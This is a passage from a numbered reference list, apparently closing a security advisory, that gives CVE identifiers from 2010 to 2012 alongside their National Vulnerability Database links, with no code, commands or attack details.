http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 171 ] CVE-2010-0167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 172 ] CVE-2010-0168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168 [ 173 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 174 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 175 ] CVE-2010-0170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170 [ 176 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 177 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 178 ] CVE-2010-0172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172 [ 179 ] CVE-2010-0173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173 [ 180 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 181 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 182 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 183 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 184 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 185 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 186 ] CVE-2010-0177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177 [ 187 ] CVE-2010-0178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178 [ 188 ] CVE-2010-0179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179 [ 189 ] CVE-2010-0181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181 [ 190 ] CVE-2010-0182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182 [ 191 ] CVE-2010-0183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183 [ 192 ] CVE-2010-0220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220 [ 193 ] CVE-2010-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648 [ 194 ] CVE-2010-0654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654 [ 195 ] CVE-2010-1028 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028 [ 196 ] CVE-2010-1121 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121 [ 197 ] CVE-2010-1125 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125 [ 198 ] CVE-2010-1196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196 [ 199 ] CVE-2010-1197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197 [ 200 ] CVE-2010-1198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198 [ 201 ] CVE-2010-1199 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199 [ 202 ] CVE-2010-1200 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200 [ 203 ] CVE-2010-1201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201 [ 204 ] CVE-2010-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202 [ 205 ] CVE-2010-1203 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203 [ 206 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 207 ] CVE-2010-1206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206 [ 208 ] CVE-2010-1207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207 [ 209 ] CVE-2010-1208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208 [ 210 ] CVE-2010-1209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209 [ 211 ] CVE-2010-1210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210 [ 212 ] CVE-2010-1211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211 [ 213 ] CVE-2010-1212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212 [ 214 ] CVE-2010-1213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213 [ 215 ] CVE-2010-1214 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214 [ 216 ] CVE-2010-1215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215 [ 217 ] CVE-2010-1585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585 [ 218 ] CVE-2010-2751 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751 [ 219 ] CVE-2010-2752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752 [ 220 ] CVE-2010-2753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753 [ 221 ] CVE-2010-2754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754 [ 222 ] CVE-2010-2755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755 [ 223 ] CVE-2010-2760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760 [ 224 ] CVE-2010-2762 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762 [ 225 ] CVE-2010-2763 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763 [ 226 ] CVE-2010-2764 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764 [ 227 ] CVE-2010-2765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765 [ 228 ] CVE-2010-2766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766 [ 229 ] CVE-2010-2767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767 [ 230 ] CVE-2010-2768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768 [ 231 ] CVE-2010-2769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769 [ 232 ] CVE-2010-2770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770 [ 233 ] CVE-2010-3131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131 [ 234 ] CVE-2010-3166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166 [ 235 ] CVE-2010-3167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167 [ 236 ] CVE-2010-3168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168 [ 237 ] CVE-2010-3169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169 [ 238 ] CVE-2010-3170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170 [ 239 ] CVE-2010-3171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171 [ 240 ] CVE-2010-3173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173 [ 241 ] CVE-2010-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174 [ 242 ] CVE-2010-3175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175 [ 243 ] CVE-2010-3176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176 [ 244 ] CVE-2010-3177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177 [ 245 ] CVE-2010-3178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178 [ 246 ] CVE-2010-3179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179 [ 247 ] CVE-2010-3180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180 [ 248 ] CVE-2010-3182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182 [ 249 ] CVE-2010-3183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183 [ 250 ] CVE-2010-3399 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399 [ 251 ] CVE-2010-3400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400 [ 252 ] CVE-2010-3765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765 [ 253 ] CVE-2010-3766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766 [ 254 ] CVE-2010-3767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767 [ 255 ] CVE-2010-3768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768 [ 256 ] CVE-2010-3769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769 [ 257 ] CVE-2010-3770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770 [ 258 ] CVE-2010-3771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771 [ 259 ] CVE-2010-3772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772 [ 260 ] CVE-2010-3773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773 [ 261 ] CVE-2010-3774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774 [ 262 ] CVE-2010-3775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775 [ 263 ] CVE-2010-3776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776 [ 264 ] CVE-2010-3777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777 [ 265 ] CVE-2010-3778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778 [ 266 ] CVE-2010-4508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508 [ 267 ] CVE-2010-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074 [ 268 ] CVE-2011-0051 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051 [ 269 ] CVE-2011-0053 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053 [ 270 ] CVE-2011-0054 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054 [ 271 ] CVE-2011-0055 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055 [ 272 ] CVE-2011-0056 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056 [ 273 ] CVE-2011-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057 [ 274 ] CVE-2011-0058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058 [ 275 ] CVE-2011-0059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059 [ 276 ] CVE-2011-0061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061 [ 277 ] CVE-2011-0062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062 [ 278 ] CVE-2011-0065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065 [ 279 ] CVE-2011-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066 [ 280 ] CVE-2011-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067 [ 281 ] CVE-2011-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068 [ 282 ] CVE-2011-0069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069 [ 283 ] CVE-2011-0070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070 [ 284 ] CVE-2011-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071 [ 285 ] CVE-2011-0072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072 [ 286 ] CVE-2011-0073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073 [ 287 ] CVE-2011-0074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074 [ 288 ] CVE-2011-0075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075 [ 289 ] CVE-2011-0076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076 [ 290 ] CVE-2011-0077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077 [ 291 ] CVE-2011-0078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078 [ 292 ] CVE-2011-0079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079 [ 293 ] CVE-2011-0080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080 [ 294 ] CVE-2011-0081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081 [ 295 ] CVE-2011-0082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082 [ 296 ] CVE-2011-0083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083 [ 297 ] CVE-2011-0084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084 [ 298 ] CVE-2011-0085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085 [ 299 ] CVE-2011-1187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187 [ 300 ] CVE-2011-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202 [ 301 ] CVE-2011-1712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712 [ 302 ] CVE-2011-2362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362 [ 303 ] CVE-2011-2363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363 [ 304 ] CVE-2011-2364 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364 [ 305 ] CVE-2011-2365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365 [ 306 ] CVE-2011-2369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369 [ 307 ] CVE-2011-2370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370 [ 308 ] CVE-2011-2371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371 [ 309 ] CVE-2011-2372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372 [ 310 ] CVE-2011-2373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373 [ 311 ] CVE-2011-2374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374 [ 312 ] CVE-2011-2375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375 [ 313 ] CVE-2011-2376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376 [ 314 ] CVE-2011-2377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377 [ 315 ] CVE-2011-2378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378 [ 316 ] CVE-2011-2605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605 [ 317 ] CVE-2011-2980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980 [ 318 ] CVE-2011-2981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981 [ 319 ] CVE-2011-2982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982 [ 320 ] CVE-2011-2983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983 [ 321 ] CVE-2011-2984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984 [ 322 ] CVE-2011-2985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985 [ 323 ] CVE-2011-2986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986 [ 324 ] CVE-2011-2987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987 [ 325 ] CVE-2011-2988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988 [ 326 ] CVE-2011-2989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989 [ 327 ] CVE-2011-2990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990 [ 328 ] CVE-2011-2991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991 [ 329 ] CVE-2011-2993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993 [ 330 ] CVE-2011-2995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995 [ 331 ] CVE-2011-2996 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996 [ 332 ] CVE-2011-2997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997 [ 333 ] CVE-2011-2998 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998 [ 334 ] CVE-2011-2999 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999 [ 335 ] CVE-2011-3000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000 [ 336 ] CVE-2011-3001 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001 [ 337 ] CVE-2011-3002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002 [ 338 ] CVE-2011-3003 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003 [ 339 ] CVE-2011-3004 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004 [ 340 ] CVE-2011-3005 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005 [ 341 ] CVE-2011-3026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026 [ 342 ] CVE-2011-3062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062 [ 343 ] CVE-2011-3232 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232 [ 344 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 345 ] CVE-2011-3640 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640 [ 346 ] CVE-2011-3647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647 [ 347 ] CVE-2011-3648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648 [ 348 ] CVE-2011-3649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649 [ 349 ] CVE-2011-3650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650 [ 350 ] CVE-2011-3651 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651 [ 351 ] CVE-2011-3652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652 [ 352 ] CVE-2011-3653 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653 [ 353 ] CVE-2011-3654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654 [ 354 ] CVE-2011-3655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655 [ 355 ] CVE-2011-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658 [ 356 ] CVE-2011-3659 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659 [ 357 ] CVE-2011-3660 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660 [ 358 ] CVE-2011-3661 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661 [ 359 ] CVE-2011-3663 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663 [ 360 ] CVE-2011-3665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665 [ 361 ] CVE-2011-3670 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670 [ 362 ] CVE-2011-3866 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866 [ 363 ] CVE-2011-4688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688 [ 364 ] CVE-2012-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441 [ 365 ] CVE-2012-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442 [ 366 ] CVE-2012-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443 [ 367 ] CVE-2012-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444 [ 368 ] CVE-2012-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445 [ 369 ] CVE-2012-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446 [ 370 ] CVE-2012-0447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447 [ 371 ] CVE-2012-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449 [ 372 ] CVE-2012-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450 [ 373 ] CVE-2012-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451 [ 374 ] CVE-2012-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452 [ 375 ] CVE-2012-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455 [ 376 ] CVE-2012-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456 [ 377 ] CVE-2012-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457 [ 378 ] CVE-2012-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458 [ 379 ] CVE-2012-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459 [ 380 ] CVE-2012-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460 [ 381 ] CVE-2012-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461 [ 382 ] CVE-2012-0462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462 [ 383 ] CVE-2012-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463 [ 384 ] CVE-2012-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464 [ 385 ] CVE-2012-0467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467 [ 386 ] CVE-2012-0468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468 [ 387 ] CVE-2012-0469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469 [ 388 ] CVE-2012-0470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470 [ 389 ] CVE-2012-0471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471 [ 390 ] CVE-2012-0473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473 [ 391 ] CVE-2012-0474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474 [ 392 ] CVE-2012-0475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475 [ 393 ] CVE-2012-0477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477 [ 394 ] CVE-2012-0478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478 [ 395 ] CVE-2012-0479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479 [ 396 ] CVE-2012-1937 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937 [ 397 ] CVE-2012-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938 [ 398 ] CVE-2012-1939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939 [ 399 ] CVE-2012-1940 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940 [ 400 ] CVE-2012-1941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941 [ 401 ] CVE-2012-1945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945 [ 402 ] CVE-2012-1946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946 [ 403 ] CVE-2012-1947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947 [ 404 ] CVE-2012-1948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948 [ 405 ] CVE-2012-1949 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949 [ 406 ] CVE-2012-1950 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950 [ 407 ] CVE-2012-1951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951 [ 408 ] CVE-2012-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952 [ 409 ] CVE-2012-1953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953 [ 410 ] CVE-2012-1954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954 [ 411 ] CVE-2012-1955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955 [ 412 ] CVE-2012-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956 [ 413 ] CVE-2012-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957 [ 414 ] CVE-2012-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958 [ 415 ] CVE-2012-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959 [ 416 ] CVE-2012-1960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960 [ 417 ] CVE-2012-1961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961 [ 418 ] CVE-2012-1962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962 [ 419 ] CVE-2012-1963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963 [ 420 ] CVE-2012-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964 [ 421 ] CVE-2012-1965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965 [ 422 ] CVE-2012-1966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966 [ 423 ] CVE-2012-1967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967 [ 424 ] CVE-2012-1970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970 [ 425 ] CVE-2012-1971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971 [ 426 ] CVE-2012-1972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972 [ 427 ] CVE-2012-1973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973 [ 428 ] CVE-2012-1974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974 [ 429 ] CVE-2012-1975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975 [ 430 ] CVE-2012-1976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976 [ 431 ] CVE-2012-1994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994 [ 432 ] CVE-2012-3956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956 [ 433 ] CVE-2012-3957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957 [ 434 ] CVE-2012-3958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958 [ 435 ] CVE-2012-3959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959 [ 436 ] CVE-2012-3960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960 [ 437 ] CVE-2012-3961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961 [ 438 ] CVE-2012-3962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962 [ 439 ] CVE-2012-3963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963 [ 440 ] CVE-2012-3964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964 [ 441 ] CVE-2012-3965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965 [ 442 ] CVE-2012-3966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966 [ 443 ] CVE-2012-3967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967 [ 444 ] CVE-2012-3968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968 [ 445 ] CVE-2012-3969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969 [ 446 ] CVE-2012-3970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970 [ 447 ] CVE-2012-3971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971 [ 448 ] CVE-2012-3972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972 [ 449 ] CVE-2012-3973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973 [ 450 ] CVE-2012-3975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975 [ 451 ] CVE-2012-3976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976 [ 452 ] CVE-2012-3977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977 [ 453 ] CVE-2012-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978 [ 454 ] CVE-2012-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980 [ 455 ] CVE-2012-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982 [ 456 ] CVE-2012-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984 [ 457 ] CVE-2012-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985 [ 458 ] CVE-2012-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986 [ 459 ] CVE-2012-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988 [ 460 ] CVE-2012-3989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989 [ 461 ] CVE-2012-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990 [ 462 ] CVE-2012-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991 [ 463 ] CVE-2012-3992 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992 [ 464 ] CVE-2012-3993 